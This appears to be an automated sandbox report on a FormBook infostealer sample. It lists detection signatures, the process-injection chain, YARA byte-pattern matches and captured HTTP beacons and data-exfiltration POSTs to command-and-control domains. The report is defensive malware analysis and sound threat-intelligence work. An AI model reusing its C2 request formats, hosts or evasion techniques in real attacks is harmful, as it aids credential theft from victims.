
# Analysis Report Mqbmupv_Signed_.exe

## Overview

### General Information

- Sample Name: Mqbmupv_Signed_.exe
- Analysis ID: 288093
- MD5: 20a3b044b6d1b39051e35269e6590c0b
- SHA1: bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6
- SHA256: 2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9
- Tags: exe

### Detection

FormBook

- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

System is w10x64

- Mqbmupv_Signed_.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
- notepad.exe (PID: 344 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
- cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- ieinstal.exe (PID: 6544 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- Mqbmnet.exe (PID: 6912 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
- ieinstal.exe (PID: 2212 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- Mqbmnet.exe (PID: 5976 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
- ieinstal.exe (PID: 5204 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
- autochk.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
- ipconfig.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
- control.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

## Malware Configuration

No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Mqbm.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x87:$hotkey: \x0AHotKey=1; 0x0:$url_explicit: [InternetShortcut] |
| C:\Users\user\AppData\Local\Mqbm.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x14:$file: URL=; 0x0:$url_explicit: [InternetShortcut] |
| C:\Users\user\AppData\Local\Mqbm.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x5c:$icon: IconFile=; 0x0:$url_explicit: [InternetShortcut] |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x1258:$file: URL=; 0x123c:$url_explicit: [InternetShortcut] |
| 00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x1284:$icon: IconFile=; 0x123c:$url_explicit: [InternetShortcut] |
| 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x620:$file: URL=; 0x604:$url_explicit: [InternetShortcut] |
| 00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr) | 0x64c:$icon: IconFile=; 0x604:$url_explicit: [InternetShortcut] |
| 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 29.2.ieinstal.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 29.2.ieinstal.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |
| 29.2.ieinstal.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | 0x17539:$sqlite3step: 68 34 1C 7B E1; 0x1764c:$sqlite3step: 68 34 1C 7B E1; 0x17568:$sqlite3text: 68 38 2A 90 C5; 0x1768d:$sqlite3text: 68 38 2A 90 C5; 0x1757b:$sqlite3blob: 68 53 D8 7F 8C; 0x176a3:$sqlite3blob: 68 53 D8 7F 8C |
| 9.2.ieinstal.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 9.2.ieinstal.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

Multi AV Scanner detection for dropped file

- Source: C:\Users\user\AppData\Local\Mqbmnet.exe Virustotal: Detection: 27%
- Source: C:\Users\user\AppData\Local\Mqbmnet.exe ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file

- Source: Mqbmupv_Signed_.exe Virustotal: Detection: 27%
- Source: Mqbmupv_Signed_.exe ReversingLabs: Detection: 45%
Yara detected FormBook

- Source: Yara match File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file

- Source: 29.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 9.2.ieinstal.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Contains functionality to enumerate / list files inside a directory
Found inlined nop instructions (likely shell or obfuscated code)

- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop esi
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi
- Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 4x nop then pop edi

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
HTTP GET or POST without a user agent

- Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
- Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware

- Source: Joe Sandbox View IP Address: 52.58.78.16
- Source: Joe Sandbox View IP Address: 162.159.129.233
Internet Provider seen in connection with other malware

- Source: Joe Sandbox View ASN Name: AMAZON-02US
- Source: Joe Sandbox View ASN Name: GOOGLEUS
JA3 SSL client fingerprint seen in connection with other malware

- Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
 Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA). Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 49 79 77 4e 7a 38 41 62 75 71 78 6b 6a 4f 6b 30 52 7a 53 30 4e 65 42 46 64 67 4a 53 59 37 66 68 37 71 63 6e 32 50 62 5a 6c 65 38 49 37 31 32 78 65 48 72 55 76 4e 65 67 44 55 47 35 50 50 63 65 6d 68 47 50 63 71 54 46 37 54 65 49 45 6e 31 42 51 47 66 37 31 45 66 68 65 6e 58 75 6b 31 78 33 58 6e 67 62 53 58 62 67 79 50 75 73 52 57 78 31 4a 48 6e 4d 49 51 59 53 66 4d 5a 4e 4e 70 52 6b 75 6e 4b 6b 43 67 71 4e 31 35 36 65 57 41 75 7e 51 4d 34 59 49 65 61 76 59 31 38 6a 6f 70 4b 61 7a 61 74 57 54 71 4c 50 41 75 76 78 34 48 69 65 4c 46 4d 53 44 79 49 69 64 4f 47 31 65 79 6b 4d 55 4c 33 6d 4e 6b 70 45 31 51 71 43 36 45 59 51 4f 55 7a 54 6e 28 54 6a 5f 6f 6f 5a 45 58 30 51 39 45 56 28 52 66 76 70 77 33 61 4e 2d 36 76 77 52 72 56 51 66 75 72 4f 74 52 50 6f 66 73 6c 68 5a 67 6a 6f 5a 31 44 53 36 47 44 6f 35 39 35 37 78 76 51 32 66 42 77 32 41 47 49 37 45 70 43 54 45 32 69 7a 33 79 34 64 35 6f 55 31 2d 64 36 34 34 75 42 6a 46 67 66 67 75 79 50 36 37 6e 69 7e 56 55 68 41 47 65 39 56 42 54 72 59 41 7a 50 38 6a 74 6f 30 57 68 53 47 77 51 61 57 79 4d 72 4d 72 47 65 6a 55 51 5f 34 52 78 45 33 4c 63 54 52 51 62 64 
6f 6d 6d 39 6a 47 79 6d 39 68 28 50 52 69 79 48 61 54 68 31 79 7a 61 77 33 2d 6c 42 44 56 7a 54 63 50 77 58 36 56 4d 70 70 55 75 61 65 6d 79 5f 59 73 77 74 76 64 65 4c 58 67 55 72 38 34 45 59 6a 53 41 56 37 4b 4c 68 6a 6d 55 6f 61 6b 6e 33 67 6f 6a 52 67 6d 77 6d 6b 2d 72 69 75 77 31 6f 6a 36 73 68 39 74 58 75 57 33 73 45 65 5a 37 69 32 56 71 63 67 33 7e 4b 47 55 58 57 6a 73 70 73 37 69 78 68 4b 69 74 33 72 64 56 6f 61 6e 74 49 28 43 31 5f 4b 6a 70 45 50 72 42 54 33 34 39 69 44 44 67 67 62 44 48 32 37 47 78 5a 73 48 66 31 34 65 71 33 52 44 70 69 70 54 30 58 48 51 30 31 6a 2d 6e 4b 56 72 41 54 4e 4f 4e 34 53 54 38 6b 71 64 42 62 72 79 55 42 55 53 67 6d 76 54 54 5a 6d 50 4a 36 36 54 69 31 39 37 54 41 52 50 38 42 35 75 63 68 59 6e 59 55 41 43 49 4b 45 62 32 68 43 71 7a 57 51 76 61 50 43 57 74 75 49 73 71 77 6c 77 43 41 33 70 75 48 4a 35 35 30 44 4f 50 70 32 4c 71 47 64 4a 74 73 38 57 38 5a 4c 30 46 6e 7a 70 61 76 4f 78 43 4e 54 4e 43 37 28 63 4f 61 42 39 48 68 41 4a 39 57 57 58 43 30 42 56 75 63 64 5f 42 58 6b 39 6c 35 28 78 69 6a 63 52 70 52 63 5f 4d 69 76 47 31 35 4a 4c 7a 41 6b 4c 69 33 31 35 5a 49 39 4f 67 4e 4a 77 6d 66 68 68 4d 65 45 70 72 6a 34 61 4c 6a 7a 33 66 55 67 36 4d 2d 74 73 68 55 58 7a 63 30 66 52 78 58 76 63 30 39 77 7a 38 56 6a 68 6d 6d 52 66 4e 31 52 6d 54 58 66 66 6d 66 74 55 72 61 5a 50 68 77 4c 5f 6d 58 75 48 6c 45 38 55 57 58 66 4c 6c 35 48 70 35 35 6d 71 76 45 28 67 53 53 33 49 62 56 4f 6b 3 Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6c 4d 39 56 42 76 5a 4a 67 71 72 7e 67 65 75 68 4d 58 43 63 64 42 7a 54 44 53 64 62 38 42 4f 
4b 53 64 63 34 5f 77 37 79 4e 48 71 31 30 78 52 75 70 77 31 58 4b 54 76 33 74 79 64 78 48 4f 5f 65 71 71 74 61 44 4d 6b 36 47 62 74 52 74 36 66 50 32 6f 6c 62 4f 33 50 63 50 4b 35 62 69 43 2d 54 46 66 6b 28 58 75 39 56 7a 6f 6f 61 36 4c 44 4e 74 68 57 37 2d 65 47 35 34 44 55 75 35 41 6a 55 38 6e 41 58 4a 75 69 61 6e 48 68 55 59 37 65 73 65 4a 4e 78 70 69 49 6e 66 56 55 68 2d 5a 45 72 41 68 53 4a 6b 64 66 46 69 50 38 42 6b 6e 58 6a 6b 79 38 37 5a 75 4c 62 44 4c 7a 37 51 6c 62 74 70 36 4a 55 59 43 57 73 54 48 32 62 30 4e 41 59 4e 45 69 38 5f 74 45 43 74 52 4f 49 7a 39 2d 58 2d 75 46 56 4a 44 77 46 57 65 4b 6d 34 4d 76 6a 73 35 49 69 4f 79 74 30 73 66 41 66 63 61 44 70 55 39 32 31 58 74 52 4e 52 73 64 78 4f 68 62 71 33 4c 45 66 78 59 72 30 77 57 34 78 73 6b 5a 44 4f 45 45 56 37 53 73 6b 35 34 4d 65 45 64 45 4b 35 68 37 59 6d 68 62 48 52 6b 42 52 31 69 63 66 33 7e 45 32 71 45 5f 68 78 46 62 6c 45 67 4f 6c 4d 44 34 42 58 63 75 58 52 41 76 79 32 48 56 53 49 45 6e 65 67 35 68 39 59 77 48 34 39 45 33 55 30 47 67 7e 61 76 65 33 34 63 55 4c 4d 50 73 31 36 66 45 77 52 76 54 64 31 6a 6e 31 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=RHR1mlM9VBvZJgqr~geuhMXCcdBzTDSdb8BOKSdc4_w7yNHq10xRupw1XKTv3tydxHO_eqqtaDMk6GbtRt6fP2olbO3PcPK5biC-TFfk(Xu9Vzooa6LDNthW7-eG54DUu5AjU8nAXJuianHhUY7eseJNxpiInfVUh-ZErAhSJkdfFiP8BknXjky87ZuLbDLz7Qlbtp6JUYCWsTH2b0NAYNEi8_tECtROIz9-X-uFVJDwFWeKm4Mvjs5IiOyt0sfAfcaDpU921XtRNRsdxOhbq3LEfxYr0wW4xskZDOEEV7Ssk54MeEdEK5h7YmhbHRkBR1icf3~E2qE_hxFblEgOlMD4BXcuXRAvy2HVSIEneg5h9YwH49E3U0Gg~ave34cULMPs16fEwRvTd1jn1A). 
Source: global traffic HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6b 55 44 5a 52 36 66 65 69 7e 75 38 77 4f 51 72 63 6e 63 4c 4e 38 70 44 68 43 6e 46 39 68 6b 4b 54 4d 30 68 75 67 54 31 75 50 71 33 33 5a 63 6a 70 77 36 66 71 54 75 6d 64 32 50 38 33 6e 79 65 72 75 44 61 44 31 79 73 77 33 6f 53 39 36 75 4f 57 74 42 4b 65 7a 59 63 4e 7e 51 62 42 7a 34 55 46 6a 6b 31 48 47 5f 61 79 35 75 64 37 48 51 41 39 39 58 35 36 61 62 35 4f 28 38 76 61 38 64 64 64 37 43 56 4f 53 70 57 48 33 4a 43 62 62 42 69 75 4e 4b 7e 49 32 58 36 73 77 54 73 62 30 78 33 56 56 52 41 30 46 42 4f 41 57 44 45 51 57 68 76 55 43 6f 37 61 50 77 42 68 50 75 28 54 41 58 76 62 66 42 4e 38 36 55 31 79 48 59 4e 48 70 78 61 4e 55 64 68 4b 52 44 55 39 38 61 50 78 30 31 49 50 47 32 59 62 6e 43 4f 45 47 79 6c 72 67 6e 72 4d 70 6e 75 70 48 74 6d 39 7e 4e 63 65 33 51 32 45 39 64 33 58 74 56 5a 78 73 4c 36 49 39 71 70 48 61 69 66 79 34 48 7e 44 43 39 79 71 6b 5a 4e 4c 5a 34 58 4c 43 65 72 74 45 65 54 6e 78 44 49 2d 68 59 64 6d 68 39 48 51 49 38 52 31 69 51 66 32 7e 2d 6b 6f 34 5f 6e 6b 4a 79 78 44 55 34 6a 4d 43 69 43 44 34 73 4d 58 73 5f 79 79 6a 56 41 4e 41 4e 65 54 5a 68 72 5a 41 45 34 5a 51 33 56 6b 47 67 34 61 75 6f 37 34 31 48 50 4f 69 52 6b 35 54 73 31 6e 65 6a 59 55 4b 66 70 62 62 71 37 52 37 35 4e 56 4d 71 77 5a 59 4c 47 2d 4e 67 76 32 69 54 64 75 4b 52 6e 69 7e 5a 4c 43 46 62 66 79 4d 30 50 5f 33 34 67 50 69 6d 45 32 76 35 4e 6b 34 57 71 6a 6a 74 6e 72 42 66 66 39 70 6d 32 48 37 42 4f 6e 31 66 30 54 50 4a 52 4c 6e 41 67 46 64 43 32 69 53 4a 54 4d 6a 31 51 47 54 38 59 44 50 30 61 4b 68 74 28 57 78 30 6f 
76 72 41 69 43 58 47 42 4c 68 70 6e 7a 62 71 4b 56 65 50 36 57 72 2d 28 4e 71 69 5a 79 56 5f 38 5a 56 62 57 43 39 71 4d 69 42 65 79 5a 58 47 62 65 75 70 52 4c 38 61 44 70 59 36 4b 68 65 5a 4a 5f 49 46 42 44 35 30 64 49 63 7a 76 61 76 6e 6e 54 42 62 75 75 54 54 62 2d 39 52 32 79 65 75 61 61 49 75 5a 4d 43 70 28 48 49 57 59 56 4f 58 55 70 79 78 4f 31 4a 51 79 4e 54 7a 53 65 62 74 36 77 66 4f 58 58 42 63 77 39 7a 74 57 6d 69 6b 54 44 37 4f 6b 5f 7e 48 57 4b 34 63 78 5a 44 4d 37 52 59 37 44 35 28 72 35 47 4e 62 67 41 68 78 34 33 45 44 63 32 4e 2d 54 50 5a 49 78 47 44 59 4a 65 54 55 56 52 64 6d 6e 66 73 71 4e 37 39 7a 69 79 67 59 51 49 6e 76 70 30 55 64 41 44 36 62 45 62 59 51 59 67 6e 48 69 73 71 6e 66 38 61 74 42 53 38 51 33 4d 54 53 6e 61 33 32 42 37 68 35 75 6e 71 6b 75 5a 78 58 6a 62 32 33 6f 67 49 67 4c 44 47 56 75 72 52 67 28 46 39 34 41 77 35 52 64 37 52 5a 79 35 71 55 72 33 43 7a 63 7a 63 55 72 31 4c 35 66 49 4d 41 34 41 49 56 4a 4d 6d 70 5a 34 63 64 41 30 4b 63 53 70 6e 61 7e 59 4b 32 6f 47 71 31 72 54 2
 Source: global traffic HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookups

- Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Posts data to webserver
 Source: unknown HTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 